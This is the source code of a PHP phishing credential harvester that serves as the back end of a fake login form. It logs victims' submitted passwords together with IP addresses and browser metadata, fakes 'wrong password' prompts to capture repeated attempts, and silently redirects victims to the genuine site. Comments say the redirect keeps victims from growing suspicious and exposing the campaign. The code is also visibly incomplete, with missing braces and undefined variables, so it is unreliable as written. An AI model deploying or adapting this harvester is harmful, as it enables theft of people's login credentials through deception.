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* PHP Script intdended to be used during Phishing attempts as a harverster
* collector linked to backdoored HTML <form> action parameter. Such action
* parameter could be set like this:
* <form [...] action="/post.php" [...]>
* and script named as 'post.php' to get it working. Additional further configurations
* can be made in the section below.
* When crafting HTML login page, one can use the PHP session variable:
* $_SESSION['phished_already']
* to add forced redirection to the target site.
* Authors:
* Mariusz Banach / mgeeky
* Jakub M. / unkn0w
* Version:
* v0.3
* Changelog:
* - v0.1 - init
* - v0.2 - added metadata gathering
* - v0.2.1 - unkn0w adds redirection to faked 'wrong password' message
* - v0.3 - added CSV reporting method
try {
/* ============================ CONFIGURATION ============================ */
// Filename for harvested data. For CSV logging method, the '.csv' fill be appended.
// Remember to keep the filename not guessable, to avoid forceful browsing against your own
// phishing box!
$harvest_filename = 'harvester_phishing_campaign_1234567890.txt';
// Target to redirect to after collecting input data.
$redirect = 'https://www.website.to/redirect.to?after=input&data=was&sent=';
// Resend post data to the redirect address?
$resend_post_data = false;
// Specifies how many login attempts user have to try before redirection to real website (must be set to 1 or more)
$password_retry = 2;
// URL for "wrong password" message redirection (applicable only if $password_retry is set to more than 1).
// May be relative URL or full one pointing at the target application's error message directly.
// Warning: If left empty - the page will be simply reloaded.
$wrong_password_url = ''; // '/index.php?wrong_pass=1';
// If this is set to true, everyone regardless of their user agents will be logged.
// Otherwise, only valid, recognized user agents (exlucding bots, or ones who tamper that
// setting) will be logged.
$log_everyone = false;
// Set this variable to:
// - 'csv' - to collect results in a CSV format.
// - 'print_r' - to use the PHP's 'print_r' function.
// - 'both' - to create two files and use them both.
$log_format = 'both';
$csv_separator = ' | ';
// Specifies whether to include in harvesting log metadata such as User Agent,
// Remote Addr (victim IP) and so on.
$show_meta_data = true;
// Exclude specific clients based on their VISITOR_ID value (16 bytes values):
$exclude_visitors = array('1234567890abcdef');
/* ============================ CONFIGURATION ============================ */
setcookie(session_name(), session_id(), time() + 7776000); // cookie for 90 days
if (empty($_POST)) {
header("Location: index.html");
$_SESSION['phishing_counter'] = isset($_SESSION['phishing_counter']) ? $_SESSION['phishing_counter'] + 1 : 1;
function array_clone($array) {
return array_map(function($element) {
return ((is_array($element))
? call_user_func(__FUNCTION__, $element)
: ((is_object($element))
? clone $element
: $element
}, $array);
function collect_columns_array($arraylog) {
$columns = array();
foreach($arraylog as $k => $v) {
if ( $k == 'meta' ) {
foreach($arraylog[$k] as $k2 => $v2) {
array_push($columns, $k2);
} else {
array_push($columns, $k);
return $columns;
function log_file_init($arraylog) {
global $log_format;
global $harvest_filename;
global $csv_separator;
if ($log_format == 'both' || $log_format == 'print_r') {
file_put_contents($harvest_filename, '');
if ($log_format == 'both' || $log_format == 'csv' ) {
$columns = implode($csv_separator, collect_columns_array($arraylog));
file_put_contents($harvest_filename . '.csv', $columns . "\n");
function log_append($arraylog) {
global $log_format;
global $harvest_filename;
global $csv_separator;
if ($log_format == 'both' || $log_format == 'print_r') {
file_put_contents($harvest_filename, print_r($arraylog, true), FILE_APPEND);
if ($log_format == 'both' || $log_format == 'csv' ) {
$columns = collect_columns_array($arraylog);
$line = '';
foreach ($columns as $col) {
if (array_key_exists($col, $arraylog['meta'])) {
$line .= $arraylog['meta'][$col] . $csv_separator;
} else {
$line .= $arraylog[$col] . $csv_separator;
$line = substr($line, 0, -strlen($csv_separator));
file_put_contents($harvest_filename . '.csv', $line . "\n", FILE_APPEND);
$to_report_array = array_clone($_POST);
$to_report_array['meta'] = array();
if ( array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)
$to_report_array['meta']['HTTP_X_FORWARDED_FOR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
$to_copy_from_server = array("REMOTE_ADDR", "HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_HOST");
for( $i = 0; $i < count($to_copy_from_server); $i++ ) {
$to_report_array['meta'][$to_copy_from_server[$i]] = $_SERVER[$to_copy_from_server[$i]];
$date = date('Y-m-d H:i:s');
$to_report_array['meta']['TIMESTAMP'] = $date;
// Add information about password-entry attempt to the logfile.
$to_report_array['meta']['COMMENT'] = "Password retries for that user: " . $_SESSION['phishing_counter'] . ". ";
if ($_SESSION['phishing_counter'] >= $password_retry) {
$to_report_array['meta']['COMMENT'] .= 'Considered phished (+). ';
// Valid user agents only
$len = strlen($_SERVER['HTTP_USER_AGENT']);
$found = 0;
$keywords = array('Chrome', 'Chromium', 'CriOS', 'Fedora', 'Firefox', 'Gecko',
'Intel', 'iPhone', 'KHTML', 'Linux', 'Macintosh', 'Mobile',
'Mozilla', 'Safari', 'Trident', 'Ubuntu', 'Version', 'Win64',
'Windows', 'WOW64', 'x86_64', 'Android', 'Phone');
for ($i = 0; $i < count($keywords); $i++) {
if(stripos($_SERVER['HTTP_USER_AGENT'], $keywords[$i]) !== false) {
// Computing unique per visitor ID to be able to grep harvest log based on that ID.
$exclude = false;
$to_report_array['meta']['VISITOR_ID'] = substr($id, 0, 16);
if(in_array($to_report_array['meta']['VISITOR_ID'], $exclude_visitors)) {
$exclude = true;
if (!$exclude && ($log_everyone || ($found >= 3 && $len > 60))) {
if(!file_exists($harvest_filename)) {
if(!$show_meta_data) {
if ($password_retry > 1) {
if ($_SESSION['phishing_counter'] < $password_retry) {
$url = (!empty($wrong_password_url))? $wrong_password_url : $_SERVER['PHP_SELF'];
header('Location: ' . $url);
if ($_SESSION['phishing_counter'] >= $password_retry) {
$_SESSION['phished_already'] = 1;
throw new Exception('Already phished.'); // redirects to target page.
header('Content-Type: text/html; charset=utf-8');
if (!$resend_post_data) {
echo '<meta http-equiv="refresh" content="0; url=' . $redirect . '" />';
} else {
echo "<html><head></head><body>";
echo "<form action='" . $redirect . "' method='post' name='frm'>";
foreach($_POST as $a => $b ) {
echo "<input type='hidden' name='" . htmlentities($a) . "' value='" . htmlentities($b) . "'>";
echo "</form><script type='text/javascript'>document.frm.submit();</script></body></html>";
} catch (Exception $e) {
// We can't take the risk of not redirecting victim into desired website,
// because such victim could become anxious or investigate the issue further
// thus compromising our campaign. That's the purpose of the try..catch statement
// applied here.
echo '<meta http-equiv="refresh" content="0; url=' . $redirect . '" />';